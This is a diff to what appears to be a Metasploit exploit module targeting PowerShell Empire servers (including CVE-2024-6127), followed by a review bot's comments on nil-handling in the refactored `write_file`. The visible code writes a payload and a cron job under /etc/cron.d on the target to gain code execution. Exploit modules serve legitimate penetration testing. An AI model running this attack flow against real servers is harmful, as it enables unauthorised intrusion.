@@ -180,7 +180,13 @@ def get_staging_key
180
180
staging_key
181
181
end
182
182
183
- def write_file ( path , data , session_id , session_key , server_epoch )
183
+ def write_file ( path , data , session_id , session_key , opts )
184
+ if datastore [ 'CVE' ] == 'CVE-2024-6127'
185
+ write_file_cve_2024_6127 ( path , data , session_id , session_key , opts [ :staging_key ] )
186
+ return
187
+ end
188
+ server_epoch = opts [ :server_epoch ]
189
+
184
190
# target_url.path default traffic profile for empire agent communication
185
191
# https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50
186
192
data = create_packet (
@@ -267,6 +273,7 @@ def exploit
267
273
fail_with ( Failure ::Unknown , "Failed to communicate with STAGE2" ) unless res and res . code == 200
268
274
aes_decrypt ( session_key , res . body )
269
275
276
+ opts = { staging_key : staging_key }
270
277
log_path = "/var/lib/powershell-empire/empire/server/downloads/#{ session_id } /agent.log"
271
278
272
279
else
@@ -289,6 +296,8 @@ def exploit
289
296
server_epoch = body [ 0 ..9 ] . to_i
290
297
session_key = body [ 10 ..-1 ]
291
298
print_good ( 'Successfully negotiated an artificial Empire agent' )
299
+
300
+ opts = { server_epoch : server_epoch }
292
301
log_path = '/agent.log'
293
302
294
303
end
@@ -308,20 +317,12 @@ def exploit
308
317
end
309
318
310
319
print_status ( "Writing payload to #{ payload_path } " )
311
- if datastore [ 'CVE' ] == 'CVE-2024-6127'
312
- write_file_cve_2024_6127 ( payload_path , payload_data , session_id , session_key , staging_key )
313
- else
314
- write_file ( payload_path , payload_data , session_id , session_key , server_epoch )
315
- end
320
+ write_file ( payload_path , payload_data , session_id , session_key , opts )
316
321
317
322
cron_path = '/etc/cron.d/' + rand_text_alpha ( 8 )
318
323
print_status ( "Writing cron job to #{ cron_path } " )
319
324
320
- if datastore [ 'CVE' ] == 'CVE-2024-6127'
321
- write_file_cve_2024_6127 ( cron_path , cron_file ( cron_command ) , session_id , session_key , staging_key )
322
- else
323
- write_file ( cron_path , cron_file ( cron_command ) , session_id , session_key , server_epoch )
324
- end
325
+ write_file ( cron_path , cron_file ( cron_command ) , session_id , session_key , opts )
325
326
print_status ( "Waiting for cron job to run, can take up to 60 seconds" )
326
327
327
328
register_files_for_cleanup ( cron_path )
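Review bot: In the `write_file` hunk (new lines 184–189) the function re-reads `datastore['CVE']` to pick a code path even though the caller has already encoded that decision by building `opts` with either `:staging_key` or `:server_epoch`, so the two selectors can drift and a mismatch silently produces `nil` from `opts[:staging_key]` or `opts[:server_epoch]`, feeding `create_packet` a nil epoch instead of failing. Prefer `write_file_cve_2024_6127(path, data, session_id, session_key, opts.fetch(:staging_key))` and `server_epoch = opts.fetch(:server_epoch)` so a missing key raises at the call site, or dispatch on `opts.key?(:staging_key)` rather than the datastore so there is a single source of truth. The condition of the `if`/`else` in `exploit` that builds `opts` lies outside the visible hunks, as does the rest of `write_file`'s body, so I am inferring that both branches are keyed on the same `datastore['CVE']` test.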